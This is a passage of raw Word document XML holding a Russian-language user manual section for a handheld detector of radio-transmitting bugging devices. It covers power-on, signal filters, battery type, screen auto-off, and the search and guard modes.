        <w:t>Включение изделия производится нажатием и удержанием в нажатом состоянии в течение 2 секунд кнопки питания. При включении слышен звуковой сигнал, на экране появляется заставка, изображенная на Рис. 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2735580" cy="2468880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Рисунок 56" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image6.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5580" cy="2468880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>После чего изделие переходит в режим поиска, при этом изображение на экране выглядит в соответствии с Рис. 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3436620" cy="3436620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Рисунок 55" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image7.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6620" cy="3436620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>Рис. 6 - вид экрана в режиме поиска</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>Выключение изделия производится аналогично: нажатием и удержанием в нажатом состоянии в течение 2 секунд кнопки ®.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:bookmarkStart w:id="32" w:name="bookmark10"/>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>Настройка изделия пользователем</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>Настройка фильтров</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
        <w:t xml:space="preserve">Данная настройка позволяет уменьшить влияние сигналов точек доступа </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5C5B">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5C5B">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t xml:space="preserve"> и базовых станций сотовой связи и тем самым облегчить поиск радиопередающих устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>- нажать кнопку О, после чего изделие отображает главное меню, на экране высвечивается картинка, представленная на Рис. 7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3901440" cy="3543300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Рисунок 54" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image8.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1440" cy="3543300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve">- кнопками « /ч » и « </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve"> ». выбрать строку «ФИЛЬТРЫ» и подтвердить выбор</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5C5B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">в открывшемся подменю (Рис. 8) выбрать необходимый фильтр, включить (отключить) его кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">О </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>(маркер фильтра при этом изменится);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t xml:space="preserve"> нажатием кнопки« &lt; » вернуться в главное меню для дальнейшей настройки или выйти сразу в режим поиска кратковременным нажатием О или О .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3223260" cy="2796540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Рисунок 64" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image9.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3260" cy="2796540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>Рис. 8 - меню настройки фильтров</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
        <w:t xml:space="preserve">Для быстрого доступа к данной настройке (без вызова главного меню) предусмотрена кнопка </w:t>
      </w:r>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>у</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>Включенные таким образом фильтры затем подсвечиваются на экране в режиме поиска голубым цветом (поз.7рис.3), неактивные фильтры остаются серыми.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>Выбор типа элементов питания:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>- Находясь в главном меню (Рис. 7), кнопками</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>«БАТАРЕЯ» и подтвердить выбор кнопкой подменю выбора типа элементов питания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>- при помощи кнопок « л »и« v » выбрать тип применяемых элементов питания:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:t xml:space="preserve"> подтвердить (при необходимости изменения) выбор другого типа элементов кнопкой ф , после чего соответствующая строка подсвечивается;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>- нажатием кнопки « &lt; » вернуться в главное меню для дальнейшей настройки или выйти сразу в режим поиска кратковременным нажатием О.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>Выбранная настройка типа элементов питания отображается в верхней строке</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:t>экрана:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:t xml:space="preserve"> выбран перезаряжаемый тип элементов питания (аккумулятор), зарядка возможна (вилка горит зеленым цветом на экране);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>- выбран неперезаряжаемый тип элементов питания (батарейка), зарядка невозможна (вилка горит красным цветом на экране).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>Настройка времени автоматического отключения экрана:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>Данная настройка позволяет с целью энергосбережения отключать экран через заданный пользователем промежуток времени, если изделием не пользуются, при этом изделие продолжает находиться в режиме поиска. Чтобы при этом посмотреть показания, достаточно нажать любую кнопку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>- Находясь в главном меню (Рис. 7), кнопками « л » и « v » выбрать строку «АВТООТКЛЮЧЕНИЕ» и подтвердить выбор кнопкой ф или«&gt;», на экране откроется подменю выбора возможных вариантов времени автоматического отключения экрана (Рис. 11)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3931920" cy="3261360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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1920" cy="3261360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>Рис. 11 - выбор времени автоматического отключения экрана</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:tab/>
        <w:t xml:space="preserve"> при помощи кнопок « л »и« v » выбрать время автоотключения либо пункт «работает всегда»;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:tab/>
        <w:t xml:space="preserve"> подтвердить (при необходимости изменения) выбор другого интервала времени кнопкой ф, после чего маркер выбранной строки меняется;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:tab/>
        <w:t xml:space="preserve"> нажатием кнопки « &lt; » вернуться в главное меню для дальнейшей настройки или выйти сразу в режим поиска кратковременным нажатием О или О.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>Режимы работы: поиск и охрана</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>2.3.3.1 Переключение режимов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>Изделие всегда включается в режиме поиска. Текущий режим отображается пиктограммой в верхней строке экрана:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>- режим поиска;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:t>- режим охраны.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1837055</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1358265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2540635" cy="2540635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="176" name="Рисунок 75" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image25.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63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461D46">
        <w:t>Переключение режимов работы производится коротким нажатием на кнопку О, на экране при этом появляется подсказка о переходе в другой режим. При переходе в режим охраны на экране на 2 секунды появляется предупреждение (Рис. 14).</w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461D46">
        <w:t>Рис. 14. Переход в режим охраны</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Затем в области построения графиков отображается анимация (заполнение области. Рис. 15), после чего экран изделия выключается.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6141720" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Рисунок 74" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image26.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1720" cy="1905000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461D46">
        <w:t xml:space="preserve">Рис. 15. </w:t>
      </w:r>
      <w:r>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:t>ереход в режим охраны.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Когда изделие находится в режиме охраны, на экране периодически появляется напоминание (Рис. 16):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3360420" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="Рисунок 73" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image27.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60420" cy="2750820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Рис. 16. Напоминание в режиме охраны.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>При переключении режима (нажатием кнопки) изделие выводит на экране на 2 секунды предупреждение (Рис. 17), после чего переходит в режим поиска.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3177540" cy="3177540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Рисунок 72" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image28.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7540" cy="3177540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461D46">
        <w:lastRenderedPageBreak/>
        <w:t>Рис. 17. Предупреждение о переходе в режим поиска.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461D46">
        <w:t>Режим поиска.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Графическое представление информации Режим поиска - основной режим работы изделия, предназначенный ря обследования помещения на предмет наличия радиопередающих устройств. Основные элементы графического интерфейса, используемые в режиме поиска, показаны на Рис. 18.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4175760" cy="2202180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Рисунок 71" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image29.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5760" cy="2202180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
